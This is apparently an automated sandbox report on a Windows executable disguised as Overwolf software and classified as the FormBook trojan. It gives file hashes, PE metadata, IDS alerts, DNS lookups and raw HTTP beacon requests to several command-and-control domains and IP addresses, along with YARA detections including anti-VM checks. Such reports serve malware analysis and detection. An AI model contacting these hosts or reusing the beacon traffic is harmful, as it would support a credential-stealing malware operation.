Analysis ID: 562399
Start date: 28.01.2022
Start time: 20:57:13
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 37s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: GV8EJooYMIgEnEk.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/1@7/5
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 20.6% (good quality ratio 18.5%)
• Quality average: 70.5%
• Quality standard deviation: 32.3%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 184.87.213.153
• Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
Time      Type             Description
20:58:32  API Interceptor  1x Sleep call for process: GV8EJooYMIgEnEk.exe modified
Process: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.355304211458859
Encrypted: false
SSDEEP: 24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5: FED34146BF2F2FA59DCF8702FCC8232E
SHA1: B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256: 123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512: 1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious: true
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.768784179337575
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: GV8EJooYMIgEnEk.exe
File size: 391680
MD5: cf6d4fd3dc8e4751b7f89f857b618ef3
SHA1: 15b95f0f1b5785bb7fd3d97757f3eea49d1f6951
SHA256: 9689e8e0cf51b8b5c98ddb007636d8acf7e03c9cc8a7bf99aafdaaebae2dfb3a
SHA512: 86af327caf1d55c8d3dd1e2319dcae1faaf7db82fb2fdce83999b0a4e5c6af2ce700fb0c69f568169110f04b9af6543e069aee59101370d6af060d8d4763d43f
SSDEEP: 6144:7qy0O+Q45IX8LhyTaFwZCpZpwhTvQJWpLcbK8lpmybOVbGmb0Xj/9JnQiypM7Jz8:7HgwZIjwxvwCLc9pHbOVLgXjLQiypM7
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...._.a............................>.... ... ....@.. .......................`............@................................
Icon Hash: 00828e8e8686b000
Entrypoint: 0x460d3e
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x61F25F83 [Thu Jan 27 09:01:55 2022 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x60cf0          0x4b          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x62000          0x61c         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x64000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x60c96          0x1c          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy          Characteristics
.text   0x2000           0x5ed44       0x5ee00   False     0.88598793643    data       7.78260076892    IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc   0x62000          0x61c         0x800     False     0.32568359375    data       3.4603762807     IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x64000          0xc           0x200     False     0.044921875      data       0.0815394123432  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name         RVA      Size   Type
RT_VERSION   0x620a0  0x38e  data
RT_MANIFEST  0x62430  0x1ea  XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
DLL          Import
mscoree.dll  _CorExeMain
Description       Data
Translation       0x0000 0x04b0
LegalCopyright    Copyright Overwolf 2021
Assembly Version  11.0.0.0
InternalName      StructuralEqualityCompar.exe
FileVersion       11.0.0.0
CompanyName       Overwolf LTD
LegalTrademarks
Comments
ProductName       Overwolf
ProductVersion    11.0.0.0
FileDescription   Overwolf
OriginalFilename  StructuralEqualityCompar.exe
Timestamp                 Protocol  SID      Message                               Source Port  Dest Port  Source IP       Dest IP
01/28/22-20:59:48.188612  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49817        80         192.168.2.3     199.59.243.200
01/28/22-20:59:48.188612  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49817        80         192.168.2.3     199.59.243.200
01/28/22-20:59:48.188612  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49817        80         192.168.2.3     199.59.243.200
01/28/22-20:59:53.555000  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49819      34.102.136.180  192.168.2.3
01/28/22-20:59:59.099003  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49820        80         192.168.2.3     18.231.72.25
01/28/22-20:59:59.099003  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49820        80         192.168.2.3     18.231.72.25
01/28/22-20:59:59.099003  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49820        80         192.168.2.3     18.231.72.25
01/28/22-21:00:09.463600  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49821        80         192.168.2.3     34.102.136.180
01/28/22-21:00:09.463600  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49821        80         192.168.2.3     34.102.136.180
01/28/22-21:00:09.463600  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49821        80         192.168.2.3     34.102.136.180
01/28/22-21:00:09.578330  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49821      34.102.136.180  192.168.2.3
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Jan 28, 2022 20:59:42.798983097 CET  49816        80         192.168.2.3     166.88.62.202
Jan 28, 2022 20:59:42.965682030 CET  80           49816      166.88.62.202   192.168.2.3
Jan 28, 2022 20:59:42.965822935 CET  49816        80         192.168.2.3     166.88.62.202
Jan 28, 2022 20:59:42.965996981 CET  49816        80         192.168.2.3     166.88.62.202
Jan 28, 2022 20:59:43.132395983 CET  80           49816      166.88.62.202   192.168.2.3
Jan 28, 2022 20:59:43.132538080 CET  80           49816      166.88.62.202   192.168.2.3
Jan 28, 2022 20:59:43.132555962 CET  80           49816      166.88.62.202   192.168.2.3
Jan 28, 2022 20:59:43.132710934 CET  49816        80         192.168.2.3     166.88.62.202
Jan 28, 2022 20:59:43.132930994 CET  49816        80         192.168.2.3     166.88.62.202
Jan 28, 2022 20:59:43.299249887 CET  80           49816      166.88.62.202   192.168.2.3
Jan 28, 2022 20:59:48.170636892 CET  49817        80         192.168.2.3     199.59.243.200
Jan 28, 2022 20:59:48.188353062 CET  80           49817      199.59.243.200  192.168.2.3
Jan 28, 2022 20:59:48.188462973 CET  49817        80         192.168.2.3     199.59.243.200
Jan 28, 2022 20:59:48.188611984 CET  49817        80         192.168.2.3     199.59.243.200
Jan 28, 2022 20:59:48.206522942 CET  80           49817      199.59.243.200  192.168.2.3
Jan 28, 2022 20:59:48.386589050 CET  80           49817      199.59.243.200  192.168.2.3
Jan 28, 2022 20:59:48.386617899 CET  80           49817      199.59.243.200  192.168.2.3
Jan 28, 2022 20:59:48.386630058 CET  80           49817      199.59.243.200  192.168.2.3
Jan 28, 2022 20:59:48.386801958 CET  49817        80         192.168.2.3     199.59.243.200
Jan 28, 2022 20:59:48.386905909 CET  49817        80         192.168.2.3     199.59.243.200
Jan 28, 2022 20:59:48.404725075 CET  80           49817      199.59.243.200  192.168.2.3
Jan 28, 2022 20:59:53.420916080 CET  49819        80         192.168.2.3     34.102.136.180
Jan 28, 2022 20:59:53.439260006 CET  80           49819      34.102.136.180  192.168.2.3
Jan 28, 2022 20:59:53.439475060 CET  49819        80         192.168.2.3     34.102.136.180
Jan 28, 2022 20:59:53.439712048 CET  49819        80         192.168.2.3     34.102.136.180
Jan 28, 2022 20:59:53.457967043 CET  80           49819      34.102.136.180  192.168.2.3
Jan 28, 2022 20:59:53.555000067 CET  80           49819      34.102.136.180  192.168.2.3
Jan 28, 2022 20:59:53.555032969 CET  80           49819      34.102.136.180  192.168.2.3
Jan 28, 2022 20:59:53.555290937 CET  49819        80         192.168.2.3     34.102.136.180
Jan 28, 2022 20:59:53.555388927 CET  49819        80         192.168.2.3     34.102.136.180
Jan 28, 2022 20:59:53.859774113 CET  49819        80         192.168.2.3     34.102.136.180
Jan 28, 2022 20:59:53.878108025 CET  80           49819      34.102.136.180  192.168.2.3
Jan 28, 2022 20:59:58.644171000 CET  49820        80         192.168.2.3     18.231.72.25
Jan 28, 2022 20:59:58.877240896 CET  80           49820      18.231.72.25    192.168.2.3
Jan 28, 2022 20:59:58.879684925 CET  49820        80         192.168.2.3     18.231.72.25
Jan 28, 2022 20:59:59.099003077 CET  49820        80         192.168.2.3     18.231.72.25
Jan 28, 2022 20:59:59.332000017 CET  80           49820      18.231.72.25    192.168.2.3
Jan 28, 2022 20:59:59.332036972 CET  80           49820      18.231.72.25    192.168.2.3
Jan 28, 2022 20:59:59.332056046 CET  80           49820      18.231.72.25    192.168.2.3
Jan 28, 2022 20:59:59.332253933 CET  49820        80         192.168.2.3     18.231.72.25
Jan 28, 2022 20:59:59.332340002 CET  49820        80         192.168.2.3     18.231.72.25
Jan 28, 2022 20:59:59.565438032 CET  80           49820      18.231.72.25    192.168.2.3
Jan 28, 2022 21:00:09.447079897 CET  49821        80         192.168.2.3     34.102.136.180
Jan 28, 2022 21:00:09.463361025 CET  80           49821      34.102.136.180  192.168.2.3
Jan 28, 2022 21:00:09.463465929 CET  49821        80         192.168.2.3     34.102.136.180
Jan 28, 2022 21:00:09.463599920 CET  49821        80         192.168.2.3     34.102.136.180
Jan 28, 2022 21:00:09.479799986 CET  80           49821      34.102.136.180  192.168.2.3
Jan 28, 2022 21:00:09.578330040 CET  80           49821      34.102.136.180  192.168.2.3
Jan 28, 2022 21:00:09.578351974 CET  80           49821      34.102.136.180  192.168.2.3
Jan 28, 2022 21:00:09.578561068 CET  49821        80         192.168.2.3     34.102.136.180
Jan 28, 2022 21:00:09.578629971 CET  49821        80         192.168.2.3     34.102.136.180
Jan 28, 2022 21:00:09.876754999 CET  49821        80         192.168.2.3     34.102.136.180
Jan 28, 2022 21:00:09.895001888 CET  80           49821      34.102.136.180  192.168.2.3
Jan 28, 2022 21:00:14.659136057 CET  49822        80         192.168.2.3     46.252.151.235
Jan 28, 2022 21:00:17.671350956 CET  49822        80         192.168.2.3     46.252.151.235
Jan 28, 2022 21:00:23.671860933 CET  49822        80         192.168.2.3     46.252.151.235
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Jan 28, 2022 20:59:42.674398899 CET  52650        53         192.168.2.3  8.8.8.8
Jan 28, 2022 20:59:42.790488005 CET  53           52650      8.8.8.8      192.168.2.3
Jan 28, 2022 20:59:48.145526886 CET  63297        53         192.168.2.3  8.8.8.8
Jan 28, 2022 20:59:48.169529915 CET  53           63297      8.8.8.8      192.168.2.3
Jan 28, 2022 20:59:53.396126986 CET  53615        53         192.168.2.3  8.8.8.8
Jan 28, 2022 20:59:53.419476032 CET  53           53615      8.8.8.8      192.168.2.3
Jan 28, 2022 20:59:58.609788895 CET  50728        53         192.168.2.3  8.8.8.8
Jan 28, 2022 20:59:58.638331890 CET  53           50728      8.8.8.8      192.168.2.3
Jan 28, 2022 21:00:04.353455067 CET  53777        53         192.168.2.3  8.8.8.8
Jan 28, 2022 21:00:04.394292116 CET  53           53777      8.8.8.8      192.168.2.3
Jan 28, 2022 21:00:09.424981117 CET  57106        53         192.168.2.3  8.8.8.8
Jan 28, 2022 21:00:09.445676088 CET  53           57106      8.8.8.8      192.168.2.3
Jan 28, 2022 21:00:14.622612000 CET  60352        53         192.168.2.3  8.8.8.8
Jan 28, 2022 21:00:14.657841921 CET  53           60352      8.8.8.8      192.168.2.3
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                         Type            Class
Jan 28, 2022 20:59:42.674398899 CET  192.168.2.3  8.8.8.8  0x48c8    Standard query (0)  www.experiencedlawfirms.com  A (IP address)  IN (0x0001)
Jan 28, 2022 20:59:48.145526886 CET  192.168.2.3  8.8.8.8  0xf74d    Standard query (0)  www.totalwinerewards.com     A (IP address)  IN (0x0001)
Jan 28, 2022 20:59:53.396126986 CET  192.168.2.3  8.8.8.8  0x2129    Standard query (0)  www.casatowerofficial.com    A (IP address)  IN (0x0001)
Jan 28, 2022 20:59:58.609788895 CET  192.168.2.3  8.8.8.8  0x2e9b    Standard query (0)  www.bitconga.com             A (IP address)  IN (0x0001)
Jan 28, 2022 21:00:04.353455067 CET  192.168.2.3  8.8.8.8  0x72a8    Standard query (0)  www.tothelaundry.com         A (IP address)  IN (0x0001)
Jan 28, 2022 21:00:09.424981117 CET  192.168.2.3  8.8.8.8  0x5eaf    Standard query (0)  www.omnipets.store           A (IP address)  IN (0x0001)
Jan 28, 2022 21:00:14.622612000 CET  192.168.2.3  8.8.8.8  0xe911    Standard query (0)  www.webarate.com             A (IP address)  IN (0x0001)
                                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                    Jan 28, 2022 20:59:42.790488005 CET | 8.8.8.8 | 192.168.2.3 | 0x48c8 | No error (0) | www.experiencedlawfirms.com |  | 166.88.62.202 | A (IP address) | IN (0x0001)
                                                    Jan 28, 2022 20:59:48.169529915 CET | 8.8.8.8 | 192.168.2.3 | 0xf74d | No error (0) | www.totalwinerewards.com |  | 199.59.243.200 | A (IP address) | IN (0x0001)
                                                    Jan 28, 2022 20:59:53.419476032 CET | 8.8.8.8 | 192.168.2.3 | 0x2129 | No error (0) | www.casatowerofficial.com | casatowerofficial.com |  | CNAME (Canonical name) | IN (0x0001)
                                                    Jan 28, 2022 20:59:53.419476032 CET | 8.8.8.8 | 192.168.2.3 | 0x2129 | No error (0) | casatowerofficial.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
                                                    Jan 28, 2022 20:59:58.638331890 CET | 8.8.8.8 | 192.168.2.3 | 0x2e9b | No error (0) | www.bitconga.com |  | 18.231.72.25 | A (IP address) | IN (0x0001)
                                                    Jan 28, 2022 21:00:04.394292116 CET | 8.8.8.8 | 192.168.2.3 | 0x72a8 | Name error (3) | www.tothelaundry.com | none | none | A (IP address) | IN (0x0001)
                                                    Jan 28, 2022 21:00:09.445676088 CET | 8.8.8.8 | 192.168.2.3 | 0x5eaf | No error (0) | www.omnipets.store | omnipets.store |  | CNAME (Canonical name) | IN (0x0001)
                                                    Jan 28, 2022 21:00:09.445676088 CET | 8.8.8.8 | 192.168.2.3 | 0x5eaf | No error (0) | omnipets.store |  | 34.102.136.180 | A (IP address) | IN (0x0001)
                                                    Jan 28, 2022 21:00:14.657841921 CET | 8.8.8.8 | 192.168.2.3 | 0xe911 | No error (0) | www.webarate.com | webarate.com |  | CNAME (Canonical name) | IN (0x0001)
                                                    Jan 28, 2022 21:00:14.657841921 CET | 8.8.8.8 | 192.168.2.3 | 0xe911 | No error (0) | webarate.com |  | 46.252.151.235 | A (IP address) | IN (0x0001)
                                                    • www.experiencedlawfirms.com
                                                    • www.totalwinerewards.com
                                                    • www.casatowerofficial.com
                                                    • www.bitconga.com
                                                    • www.omnipets.store
                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    0 | 192.168.2.3 | 49816 | 166.88.62.202 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 28, 2022 20:59:42.965996981 CET | 9880 | OUT | GET /cbgo/?Xf3=7nL8&4hPx=7Chnk+6aZrnZKD5hPI2GMOI+n7dvSwdfhhGQh0Quh+scZbPipDWGAiRMNWcFVsP/HL+E HTTP/1.1
                                                    Host: www.experiencedlawfirms.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 28, 2022 20:59:43.132538080 CET | 9881 | IN | HTTP/1.1 302 Moved Temporarily
                                                    Date: Fri, 28 Jan 2022 19:59:41 GMT
                                                    Connection: close
                                                    Content-Length: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    Cache-Control: private, no-cache, no-store, max-age=0
                                                    Expires: Mon, 01 Jan 1990 0:00:00 GMT
                                                    Location: https://www.dynadot.com/forsale/experiencedlawfirms.com?drefid=2071


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    1 | 192.168.2.3 | 49817 | 199.59.243.200 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 28, 2022 20:59:48.188611984 CET | 9882 | OUT | GET /cbgo/?4hPx=1bX869aeBvRpB8efE68exBqREj8ZtAjUgPjKFGRzRfZzNr9ae7mwrEXk0/ZD8RpqTQtr&Xf3=7nL8 HTTP/1.1
                                                    Host: www.totalwinerewards.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 28, 2022 20:59:48.386589050 CET | 9883 | IN | HTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Fri, 28 Jan 2022 19:59:48 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: parking_session=915ee359-eb6f-27d3-758c-9b4148d69bcd; expires=Fri, 28-Jan-2022 20:14:48 GMT; Max-Age=900; path=/; HttpOnly
                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_YiK60Qco7iKrEoYb629f/pqFNNxNMwpqSwbmJjBGxbwL67qPTHjuiYjl+re72XQaOdlZyuLDY5NjvdcCv8Qk9g==
                                                    Cache-Control: no-cache
                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                    Cache-Control: no-store, must-revalidate
                                                    Cache-Control: post-check=0, pre-check=0
                                                    Pragma: no-cache
                                                    Data Ascii: 589<!doctype html><html lang="en" data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_YiK60Qco7iKrEoYb629f/pqFNNxNMwpqSwbmJjBGxbwL67qPTHjuiYjl+re72XQaOdlZyuLDY5NjvdcCv8Qk9g=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="shortcut icon" href="/favicon.ico" type="image/x-icon"/><link rel="preconnect" href="https://www.google.com" crossorigin><


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    2 | 192.168.2.3 | 49819 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 28, 2022 20:59:53.439712048 CET | 9894 | OUT | GET /cbgo/?Xf3=7nL8&4hPx=EmDZCHQOcI1nLFjwZeeYVuMSiom2MDKGDS/zESQUEEY6NQpaRm0dZ/ZfJs3HzPw+5Ylf HTTP/1.1
                                                    Host: www.casatowerofficial.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 28, 2022 20:59:53.555000067 CET | 9894 | IN | HTTP/1.1 403 Forbidden
                                                    Server: openresty
                                                    Date: Fri, 28 Jan 2022 19:59:53 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 275
                                                    ETag: "61f22041-113"
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    3 | 192.168.2.3 | 49820 | 18.231.72.25 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 28, 2022 20:59:59.099003077 CET | 9895 | OUT | GET /cbgo/?4hPx=dYuxO3siHqLtebwjMrcX5kx68cWjYzK43o/BCbb09yTbLvpXET1fm3yQPY7Ys1RTSltw&Xf3=7nL8 HTTP/1.1
                                                    Host: www.bitconga.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 28, 2022 20:59:59.332036972 CET | 9896 | IN | HTTP/1.1 301 Moved Permanently
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Fri, 28 Jan 2022 19:59:59 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 178
                                                    Connection: close
                                                    Location: https://www.bitconga.com/cbgo/?4hPx=dYuxO3siHqLtebwjMrcX5kx68cWjYzK43o/BCbb09yTbLvpXET1fm3yQPY7Ys1RTSltw&Xf3=7nL8
                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    4 | 192.168.2.3 | 49821 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 28, 2022 21:00:09.463599920 CET | 9897 | OUT | GET /cbgo/?4hPx=t6byCRjNUQvGMW438Oj8n0b0Tq5DbL5JR7oEbxqA77YwnlkkuyfhzykLt/IStXAvHe2n&Xf3=7nL8 HTTP/1.1
                                                    Host: www.omnipets.store
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 28, 2022 21:00:09.578330040 CET | 9897 | IN | HTTP/1.1 403 Forbidden
                                                    Server: openresty
                                                    Date: Fri, 28 Jan 2022 20:00:09 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 275
                                                    ETag: "61f22041-113"
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>



                                                    Target ID:0
                                                    Start time:20:58:13
                                                    Start date:28/01/2022
                                                    Path:C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe"
                                                    Imagebase:0x590000
                                                    File size:391680 bytes
                                                    MD5 hash:CF6D4FD3DC8E4751B7F89F857B618EF3
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.345998808.0000000002965000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low

                                                    Target ID:3
                                                    Start time:20:58:34
                                                    Start date:28/01/2022
                                                    Path:C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe
                                                    Imagebase:0xd80000
                                                    File size:391680 bytes
                                                    MD5 hash:CF6D4FD3DC8E4751B7F89F857B618EF3
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
